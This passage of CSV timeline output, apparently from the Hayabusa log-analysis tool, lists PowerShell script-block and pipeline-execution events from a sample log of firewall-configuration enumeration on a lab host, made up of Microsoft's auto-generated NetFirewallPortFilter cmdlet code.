(cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) 
} } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallPortFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) 
$__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings 
= 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name 
= 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.911 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
